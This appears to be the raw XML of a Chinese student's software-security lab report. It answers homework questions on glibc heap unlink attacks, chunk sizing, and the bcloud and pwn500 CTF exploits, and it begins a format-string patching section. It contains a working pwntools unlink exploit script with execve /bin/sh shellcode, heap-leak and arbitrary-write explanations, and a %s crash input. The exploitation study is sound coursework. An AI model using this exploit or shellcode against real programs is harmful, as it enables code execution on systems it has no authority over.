          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>666字节</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>，s</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>econd</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>块当中</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>, size of previous 1字节，size of chunk 1字节 ，second本身12字节。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>因此合算起来，总共680=666+1+1+12</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如图所示。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0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覆盖了first的数据区，second_chunk的pre_size，size,fd,bk；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/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5363210" cy="4026535"/>
            <wp:effectExtent l="0" t="0" r="127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图3.3</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:eastAsia="宋体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</w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>作业2</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>问题：</w:t>
      </w:r>
      <w:r>
        <w:t>attack.c中覆盖第二个chunk的元数据，为什么要FUNCTION_POINTER-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>12？</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:eastAsia="宋体"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>答：</w:t>
      </w:r>
      <w:r>
        <w:t>在unlink时</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:t>FD</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>=p-&gt;fd</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t> = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>function</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>_pointer-12 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>；</w:t>
      </w:r>
      <w:r>
        <w:t>BK=p-&gt;bk=code_addr</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>；</w:t>
      </w:r>
      <w:r>
        <w:t>FD-&gt;bk = BK；等价于*(function_pointer-12+12)=BK=code_addr</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>；</w:t>
      </w:r>
      <w:r>
        <w:t>而 BK-&gt;fd = FD;等价于*(code_addr+8)=FD; 所以覆盖第二个chunk时，是为了修改function_poi</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>nter让其指向code_addr</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>。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</w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>作业3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</w:rPr>
        <w:t xml:space="preserve">shellcode开头是eb0a，表示跳过12个字节，为什么要跳过后面的"ssppppffff" </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>？</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 另外请反汇编shellcode解释shellcode的功能</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>答：因为unlink时，有bk–&gt;fd＝FD；等价成 *(code_addr+8)=FD，代码意思是 修改shellcode的第八个字节之后的4个字节。所以不跳过的话就会异常。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>shecode的功能是调用 shell</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pP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</w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>作业4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</w:rPr>
        <w:t>vuln.c中分配的666字节和12字节的chunk，实际分配大小是多大？属于第几个虚拟bin？如果是在64位平台呢？</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>答：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>1、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>实际分配大小：672字节，因为（666-4+8）要对齐8字节。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0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属于bin66</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/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64位时</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>实际688字节（666-8+16）要对齐16字节，属于bin43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</w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>作业5</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>问题：</w:t>
      </w:r>
      <w:r>
        <w:t>课程提供的glibc源代码中unlink宏去掉了哪些保护措施导致unlink攻击可以成功？解释这些安全措施的含义</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>答：</w:t>
      </w:r>
      <w:r>
        <w:t>unlink宏去掉了 “p-&gt;bk-&gt;fd=p,p-&gt;fd-&gt;bk=p” 这个部分，主要目的是不再检查双链表的是否完整。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</w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>作业6</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>问题：</w:t>
      </w:r>
      <w:r>
        <w:t>vuln.c中第一次调用free的时候是什么情况下进行chunk的consolidation的？依据源代码进行分析，给出分析过程</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>答：</w:t>
      </w:r>
      <w:r>
        <w:t>当上一块chunk不是free状态，下一块chunk为free状态，则合并下一块second ；</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:t> /* consolidate forward */                       </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>if (!nextinuse) {                                                       </w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:t>    unlink(av, nextchunk, bck, fwd);    </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="12"/>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:left="780" w:firstLine="0" w:firstLineChars="0"/>
        <w:rPr>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pP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</w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>作业7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问题：</w:t>
      </w:r>
      <w:r>
        <w:t>将attack.c的攻击代码，用Python+pwntools重写题</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。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虚拟机中已经安装好了python(2.x)，pwntools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学习pwntools的使用方法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提交改写后的Python代码</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>答：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>from pwn import *</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>context.log_level="debug"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>shellcode="\xeb\xeb\x0assppppffff\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>FUNCTION_POINTER=0x8049778</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>CODE_ADDRESS=0x804a008+0x10</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>payload=p32(0xdefaced)*4</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>payload+=shellcode</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>payload=payload.ljust(664,'B')</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>payload+=p32(0xffffffff)+p32(0xfffffffc)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">payload+=p32(FUNCTION_POINTER-12) </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">payload+=p32(CODE_ADDRESS) </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>f=open("input_str.txt","wb")</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>f.write(payload)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>f.close()</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>p=process(argv=['./vuln',payload])</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>p.interactive()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</w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>作业8</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>问题：</w:t>
      </w:r>
      <w:r>
        <w:t>请解释bcloud的exploit脚本中第96行到第100行代码的含义，其中pos变量的值是怎么计算出来的，目的是什么？</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5266055" cy="821690"/>
            <wp:effectExtent l="0" t="0" r="6985" b="127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答</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>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计算过程：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</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>NextchunkAddr=TopChunkAddr+pos+8;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>NextchunkAddr=0x804b120-8；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>所以</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>TopChunkAddr=heapBase+0x48*3+0x48*4；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>pos=NextchunkAddr-TopChunkAddr-8=0x804b120- (heapBase+0x48*3+0x48*4+16)；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:ind w:firstLine="420" w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>目的是为了在下次进行malloc时能通过修改content指针数组来达到在任意地址写入内容。</w:t>
      </w:r>
    </w:p>
    <w:p/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</w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>作业9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</w:rPr>
        <w:t>请解释为什么第118行到121行代码可以泄露出printf的地址？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1150620"/>
            <wp:effectExtent l="0" t="0" r="1905" b="762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答：</w:t>
      </w:r>
      <w:r>
        <w:t>当从top切割分配时，new_top_addr =old_top_addr + nbsize</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:t>此时old_top_addr = heapBase + 0x48*3(name,org,host) + 0x48*4(脚本申请的四块)+8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jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>为了使下一次分配的返回值为0x804b120（content指针数组位置），</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>所以</w:t>
      </w:r>
      <w:r>
        <w:t>new_top_addr = 0x804b120 - 8; nbsize = 0x804b120 - 8 - (heapBase + 0x48*3(name,org,host) + 0x48*4+8)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:t>下一次malloc，我们就可以修改content指针数组的值，达到任意地址写入的目的。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</w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>作业10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问题：</w:t>
      </w:r>
      <w:r>
        <w:t>pwn500的exploit脚本第189行调用了show_all_receivers()，为什么能够泄露heapbase，即堆的起始地址？</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>答：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>control处存了sender_info的指针，</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>重叠堆块攻击时，把某个receiver的next指针覆盖为addr_control-0x20</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>0x18e7460:</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:t>0x0000000000000000</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">0x00000000000000c1 #recevier </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>0x18e7470:</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:t>0x0000000000603098</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">0x0000000000000000 </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>0x18e7480:</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:t>0x0000000042424242</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">0x0000000000000000 name </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>0x18e7490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postcodes </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>0x18e74a0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contact </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>0x18e74b0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address</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">show_all_receivers时，会遍历到0x6030B8-0x20；然后打印相关信息； </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">gdb-peda$ x/20gx 0x6030B8-0x20 </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>0x603098:</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:t>0x0000000000000000</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">0x00007fe1e947e620 </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>0x6030a8 &lt;stdin&gt;:</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:t>0x00007fe1e947d8e0</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">0x0000000000000000 </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>0x6030b8:</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:t>0x0000000001b3a010</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">0x0000000000000000 #control </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>0x6030c8:</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:t>0x0000000000000000</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">0x0000000000000000 </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">postcodes对应偏移0x20, </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>000000000040160C lea r8, [rbx+20h]；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:ind w:firstLine="420" w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:t>这里传参给printf_chk可以打印出sender_info的地址，这个指针指向malloc的第一块，减去0x10就是heap_base。</w:t>
      </w:r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42" w:name="_Toc45180077"/>
      <w:bookmarkStart w:id="43" w:name="_Toc23155"/>
      <w:bookmarkStart w:id="44" w:name="_Toc10416"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>实验问题分析与总结</w:t>
      </w:r>
      <w:bookmarkEnd w:id="42"/>
      <w:bookmarkEnd w:id="43"/>
      <w:bookmarkEnd w:id="44"/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实验过程中，学习了堆栈溢出的应用、pwntools的使用以及了解了CTF的相应知识。之前也想参加相关的比赛，但是自己的知识不够充足也没受过相应的训练，所以放弃了。但是在这次的课堂当中，我对CTF的题型有了进一步的理解，也希望下次有机会能够参加相应的比赛。</w:t>
      </w:r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45" w:name="_Toc17357"/>
      <w:bookmarkStart w:id="46" w:name="_Toc45180078"/>
      <w:bookmarkStart w:id="47" w:name="_Toc26503"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>建议与意见</w:t>
      </w:r>
      <w:bookmarkEnd w:id="45"/>
      <w:bookmarkEnd w:id="46"/>
      <w:bookmarkEnd w:id="47"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="30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无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</w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="48" w:name="_Toc45180083"/>
      <w:bookmarkStart w:id="49" w:name="_Toc27620"/>
      <w:bookmarkStart w:id="50" w:name="_Toc302"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>补丁技术</w:t>
      </w:r>
      <w:bookmarkEnd w:id="48"/>
      <w:bookmarkEnd w:id="49"/>
      <w:bookmarkEnd w:id="50"/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51" w:name="_Toc45279768"/>
      <w:bookmarkStart w:id="52" w:name="_Toc13324"/>
      <w:bookmarkStart w:id="53" w:name="_Toc26096"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>实验过程记录</w:t>
      </w:r>
      <w:bookmarkEnd w:id="51"/>
      <w:bookmarkEnd w:id="52"/>
      <w:bookmarkEnd w:id="53"/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</w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>格式化字符串漏洞print_with_puts补丁</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="5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漏洞检测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对目标代码进行编译，显然编译的过程中就存在warning，如图4.1所示。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5273040" cy="1686560"/>
            <wp:effectExtent l="0" t="0" r="0" b="5080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  <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>图4.1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420" w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>对其运行，并输入%s%s%s%s%s来使其溢出。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如下是运行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
